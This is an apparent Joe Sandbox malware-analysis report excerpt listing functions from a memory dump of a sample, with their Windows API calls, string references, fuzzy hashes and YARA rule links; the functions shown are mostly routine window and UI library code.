Opcode Fuzzy Hash: 6e209e865248eafcd8a4c5568b72a63cc8f765b9c44ec34d45a7525fcc2c667b
Instruction Fuzzy Hash: 65F14B75A1020AAFDB21DFA4D885AEEB7FAFF18300F154529F545E7260DB319E90CB50

Function 0025083D Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00250844

Part of subcall function 00233605: FillRect.USER32(?,00000020), ref: 00233619

Strings

d, xrefs: 0025089C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FillH_prolog3Rect
String ID: d
API String ID: 1863035756-2564639436
Opcode ID: f04117c788012b6c3a26192b36e9f8113f9183e98894e41476cf90bc779094cc
Instruction ID: 9ba574d2008e4efb5db0338aed258c35f6402e5ca49ddcfd5df513b7466d8940
Opcode Fuzzy Hash: f04117c788012b6c3a26192b36e9f8113f9183e98894e41476cf90bc779094cc
Instruction Fuzzy Hash: 53C1DD7192021A9FCF04DFA8CCD59EEBBB4EF08315F10052AF951A6291C734D969DBA4

Function 002009D9 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 430windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00200A2B
IsRectEmpty.USER32(?), ref: 00200A35
IsIconic.USER32(?), ref: 00200A90
BeginDeferWindowPos.USER32(00000000), ref: 00200ACA
GetClientRect.USER32(?,?), ref: 00200AF4
IsRectEmpty.USER32(?), ref: 00200AFE
IsRectEmpty.USER32(?), ref: 00200B94
EqualRect.USER32(?,?), ref: 00200BD9
GetParent.USER32(?), ref: 00200DD5
GetWindowRect.USER32(?,?), ref: 00200C80

Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139

EndDeferWindowPos.USER32(?), ref: 00200EC1

Strings

X/, xrefs: 00200B58, 00200E8F
D2, xrefs: 00200CA9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Client$EmptyWindow$DeferScreen$BeginEqualIconicParent
String ID: D2$X/
API String ID: 3453398311-14103545
Opcode ID: 6e42cfa8aa24f850bd7bd2151fdb5bc22c87b3334d6244ce824739d69511f625
Instruction ID: 1820876d1af23cb8b133892634194c8a3e51cdb4fab2387638e45c5c788acecc
Opcode Fuzzy Hash: 6e42cfa8aa24f850bd7bd2151fdb5bc22c87b3334d6244ce824739d69511f625
Instruction Fuzzy Hash: 11F17A31A1030A9FEF15DFA4D9C4BEEB7B6BF59304F140469E806AB296DB70AD15CB10

Function 001E4F49 Relevance: 21.3, APIs: 14, Instructions: 280keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001E502D
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 001E5049
GetCapture.USER32 ref: 001E50C3
GetKeyState.USER32(00000011), ref: 001E5125
GetKeyState.USER32(00000010), ref: 001E5132
ImmGetContext.IMM32(?), ref: 001E5140
ImmGetOpenStatus.IMM32(00000000,?), ref: 001E514D
ImmReleaseContext.IMM32(?,00000000,?), ref: 001E516F
GetFocus.USER32 ref: 001E5199
IsWindow.USER32(?), ref: 001E51DA
IsWindow.USER32(?), ref: 001E5260
ClientToScreen.USER32(?,?), ref: 001E5270
IsWindow.USER32(?), ref: 001E5296
ClientToScreen.USER32(?,?), ref: 001E52C5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: d34629335b4ee940ce5c5955a23275e54ad694c2a7bf8c52d6d736dcabcb2b88
Instruction ID: d4a6cd0ef7e89a4aee0da8f8f419b125296b3f8fa610f9ce584fe7688703ec35
Opcode Fuzzy Hash: d34629335b4ee940ce5c5955a23275e54ad694c2a7bf8c52d6d736dcabcb2b88
Instruction Fuzzy Hash: 99A1A131500E86EFDF289FA6D884ABEB7A6FF14348F104529F596D61A1DB31D890DB40

Function 001E3094 Relevance: 21.3, APIs: 14, Instructions: 268keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001E316D
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 001E3189
GetCapture.USER32 ref: 001E3209
GetKeyState.USER32(00000011), ref: 001E325C
GetKeyState.USER32(00000010), ref: 001E3269
ImmGetContext.IMM32(?), ref: 001E3277
ImmGetOpenStatus.IMM32(00000000,?), ref: 001E3284
ImmReleaseContext.IMM32(00000000,00000000,?), ref: 001E32A6
GetFocus.USER32 ref: 001E32D0
IsWindow.USER32(?), ref: 001E3311
IsWindow.USER32(?), ref: 001E3397
ClientToScreen.USER32(?,?), ref: 001E33A7
IsWindow.USER32(?), ref: 001E33CD
ClientToScreen.USER32(?,?), ref: 001E33FC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: cdba20ff8340c235bc019e290f57a87c43055c9113a27a2b9182336fc6aa42bb
Instruction ID: 2eb8f6ba0162ea875c7dddc82ba0f9338e549f8075622b897ef2aef627f7b094
Opcode Fuzzy Hash: cdba20ff8340c235bc019e290f57a87c43055c9113a27a2b9182336fc6aa42bb
Instruction Fuzzy Hash: F691C171600A86EFDF259BA2C8C8A7EB7A9FF14301F10852DF5A697161DB31DE91DB00

Function 001EB730 Relevance: 21.3, APIs: 14, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 001EB7AD
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 001EB7CB
ReleaseCapture.USER32 ref: 001EB7D1
SetCapture.USER32(?), ref: 001EB7E4
ReleaseCapture.USER32 ref: 001EB859
SetCapture.USER32(?), ref: 001EB86C
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 001EB945
UpdateWindow.USER32(?), ref: 001EB9A8
SendMessageW.USER32(?,00000111,000000FF,00000000), ref: 001EB9F0
IsWindow.USER32(?), ref: 001EB9FB
IsIconic.USER32(?), ref: 001EBA08
IsZoomed.USER32(?), ref: 001EBA15
IsWindow.USER32(?), ref: 001EBA29
UpdateWindow.USER32(?), ref: 001EBA75

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
String ID:
API String ID: 2500574155-0
Opcode ID: 072353aa878ca9d242668363f1bb6493957fc49ca9016f59aa4e242d7bb7b83d
Instruction ID: 0b468fde60a15a5f10e51a235b01b831e3748ee628679b9dc5fd4c49ca28e421
Opcode Fuzzy Hash: 072353aa878ca9d242668363f1bb6493957fc49ca9016f59aa4e242d7bb7b83d
Instruction Fuzzy Hash: 9DA15A74604644AFCF119F65C8C9AAE7BB6BF44350F1541B9FD599F2A6CB30C940DB10

Function 00212724 Relevance: 16.7, APIs: 11, Instructions: 220windowkeyboardCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00212752
GetFocus.USER32 ref: 00212760
IsChild.USER32(?,?), ref: 00212794
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002127C8
IsChild.USER32(?,?), ref: 002127E4
SendMessageW.USER32(?,00000100,?,00000000), ref: 00212813
IsIconic.USER32(?), ref: 00212854
GetAsyncKeyState.USER32(00000011), ref: 002128DA
GetAsyncKeyState.USER32(00000012), ref: 002128EC
GetAsyncKeyState.USER32(00000010), ref: 002128F9
IsWindowVisible.USER32(?), ref: 0021295A

Part of subcall function 0021F443: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0021F470

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AsyncStateWindow$ChildMessageSend$FocusIconicRedrawVisible
String ID:
API String ID: 763474574-0
Opcode ID: fc50a1a8f0455613577762838f6f80d8233cdbf30cb113b4839fcb2710c23938
Instruction ID: b00430ccb1942a977d14eeedbd3fb43c84af5d9b7b6cbf93e7bc5e5baccad208
Opcode Fuzzy Hash: fc50a1a8f0455613577762838f6f80d8233cdbf30cb113b4839fcb2710c23938
Instruction Fuzzy Hash: 9471E732620246DFDB209F64C8C5BEAB7E9BB64340F154578F985DB2A0DB719CB88B50

Function 002131B3 Relevance: 16.6, APIs: 11, Instructions: 99windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 002131D5
GetSystemMetrics.USER32(00000020), ref: 002131DC
IsIconic.USER32(?), ref: 002131F0
GetWindowRect.USER32(?,00000020), ref: 00213231
IsIconic.USER32(?), ref: 00213255
GetSystemMetrics.USER32(00000004), ref: 00213261
OffsetRect.USER32(00000020,?,?), ref: 00213273
GetSystemMetrics.USER32(00000004), ref: 0021327B
IsIconic.USER32(?), ref: 002132A9
GetSystemMetrics.USER32(00000021), ref: 002132B5
GetSystemMetrics.USER32(00000020), ref: 002132BC

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Iconic$RectWindow$LongOffset
String ID:
API String ID: 993849457-0
Opcode ID: 870e955d671e5e9d8a396b9a4b7d5ca0fff7804797f1dc3dbdd6a58ddcdda972
Instruction ID: 6995f9e8e3ed4f563a48f82403045590d473c3f41a3dddb9c0a5d95f7e63a86c
Opcode Fuzzy Hash: 870e955d671e5e9d8a396b9a4b7d5ca0fff7804797f1dc3dbdd6a58ddcdda972
Instruction Fuzzy Hash: 8E410AB1A0020A9FCF14DFA9D985BAEBBF9FF58300F144069E949EB251DB30A940CF54

Function 0020A90D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 0020A99D
_memset.LIBCMT ref: 0020A9AB
_free.LIBCMT ref: 0020A9D7
IsWindow.USER32(?), ref: 0020AAF8

Strings

0, xrefs: 0020A9C1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreenWindow_free_memset
String ID: 0
API String ID: 2869304798-4108050209
Opcode ID: f05d5cd00e2384f6bbc85bb3d0014efa36c83383de38ec08db4ae33a11932244
Instruction ID: 6347a6e4ee8b0cc2d8a52f1fe93a63377dc771e50687c8268fae0baa6cfe4ae0
Opcode Fuzzy Hash: f05d5cd00e2384f6bbc85bb3d0014efa36c83383de38ec08db4ae33a11932244
Instruction Fuzzy Hash: 49518D30B203059FDB20DFA4D988BADBBB5BF14310F90412AE956A72D2DB759C91CB52

Function 002134B3 Relevance: 15.1, APIs: 10, Instructions: 146windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002134D9
ScreenToClient.USER32(?,?), ref: 00213557
GetSystemMetrics.USER32(00000021), ref: 00213565
GetSystemMetrics.USER32(00000020), ref: 0021356E
IsIconic.USER32(?), ref: 0021357C
GetSystemMetrics.USER32(00000004), ref: 00213588
PtInRect.USER32(00000000,?,?), ref: 002135CF
PtInRect.USER32(?,?,?), ref: 002135F8
GetSystemMetrics.USER32(00000004), ref: 0021360E
PtInRect.USER32(00000020,?,?), ref: 00213626

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Rect$ClientIconicScreenVisibleWindow
String ID:
API String ID: 1122842830-0
Opcode ID: 5a73bc7763a929d7449d56836dfad94bc9693baaddf99a04487ac9347d3ddf90
Instruction ID: 84502da98cf9ebb927b6c31645adcdfa9e2886c9d72b9ab61399f809668f76c5
Opcode Fuzzy Hash: 5a73bc7763a929d7449d56836dfad94bc9693baaddf99a04487ac9347d3ddf90
Instruction Fuzzy Hash: 35514171A1015AAFCB10DF64D884AEEB7FAFF18750F544069E909EB250DB70EE51CB90

Function 0021FE15 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0021FE4B

Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F7AE
Part of subcall function 0021F798: GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0021FE6E,?), ref: 0021F7CD
Part of subcall function 0021F798: SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F7F6
Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F7FF
Part of subcall function 0021F798: IsZoomed.USER32(?), ref: 0021F80A
Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F000,00000003), ref: 0021F824
Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F010,00000003), ref: 0021F830
Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F030,00000003), ref: 0021F83C
Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F030,00000000), ref: 0021F873
Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F87B
Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8A1
Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0021FE6E,?), ref: 0021F8AD
Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F8B5
Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8D5
Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F8E7

Strings

y, xrefs: 0021FE8C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$ItemParent$Enable$Delete$DefaultRectSystemWindowZoomed
String ID: y
API String ID: 540879578-4225443349
Opcode ID: 7697640a474136e39b7c4febe255f2960cd9aecddb99c75a58f37b229c42c66a
Instruction ID: 03d7cc026103bc0d415fb4fb2b87c10a3e04daa44b9ebdc03d2a047ddcd9d600
Opcode Fuzzy Hash: 7697640a474136e39b7c4febe255f2960cd9aecddb99c75a58f37b229c42c66a
Instruction Fuzzy Hash: 4E31C67292020A9BCF60DF68CA857EE77F4AB79310F21443AE865EB562D7708D91CF50

Function 001DD5ED Relevance: 12.1, APIs: 8, Instructions: 132filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001DD5F7
GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000268,001DD7D2,?,?,00000000), ref: 001DD635

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

PathIsUNCW.SHLWAPI(?,00000000), ref: 001DD6B1
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001DD6D8
CharUpperW.USER32(?), ref: 001DD70B
FindFirstFileW.KERNEL32(?,?), ref: 001DD727
FindClose.KERNEL32(00000000), ref: 001DD733
lstrlenW.KERNEL32(?), ref: 001DD751

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 483ed810c27ef4deb090e887c1f7339cdd3f296ac221d8cc302eca9b47397b3b
Instruction ID: b3e9fc2229e447eafd4ff110fad4d16756c6b5375675f0fcfdf7b27fe49dde26
Opcode Fuzzy Hash: 483ed810c27ef4deb090e887c1f7339cdd3f296ac221d8cc302eca9b47397b3b
Instruction Fuzzy Hash: EA4161719042159BDF25AB60DC9DFBE7679AF20314F1402DAB91AA2291DF31DE80DF50

Function 002B86A5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D1231: __EH_prolog3_catch.LIBCMT ref: 001D1238

GetUserDefaultUILanguage.KERNEL32(00000000,00000005,002B8686,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B86ED
FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B872B
FindResourceW.KERNEL32(00000000,?,00000005,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8744
LoadResource.KERNEL32(00000000,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8752
GlobalAlloc.KERNEL32(00000040,00000000,00000005,002B8686,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8782

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

MS UI Gothic, xrefs: 002B8707

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$Find$AllocDefaultException@8GlobalH_prolog3H_prolog3_catchLanguageLoadThrowUser
String ID: MS UI Gothic
API String ID: 2010067809-1905310704
Opcode ID: 55b5994922171f69b4ac0b7d10987755ba3af23418982a0ccc734b97fbcd6824
Instruction ID: 6e2c5100c7e6b6d7f5172ba288b47f87bce8359276b1efe4573c1a5b500332a4
Opcode Fuzzy Hash: 55b5994922171f69b4ac0b7d10987755ba3af23418982a0ccc734b97fbcd6824
Instruction Fuzzy Hash: 84314975610106AFDB116F64DC8AEBA776DEF60354B148029FD09DF291EF30DC51DA60

Function 0020794D Relevance: 9.1, APIs: 6, Instructions: 116keyboardwindowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 002079CF
UpdateWindow.USER32(?), ref: 002079E6
GetKeyState.USER32(00000079), ref: 00207A0B
GetKeyState.USER32(00000012), ref: 00207A18
GetParent.USER32(?), ref: 00207ACE
PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00207AEA

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

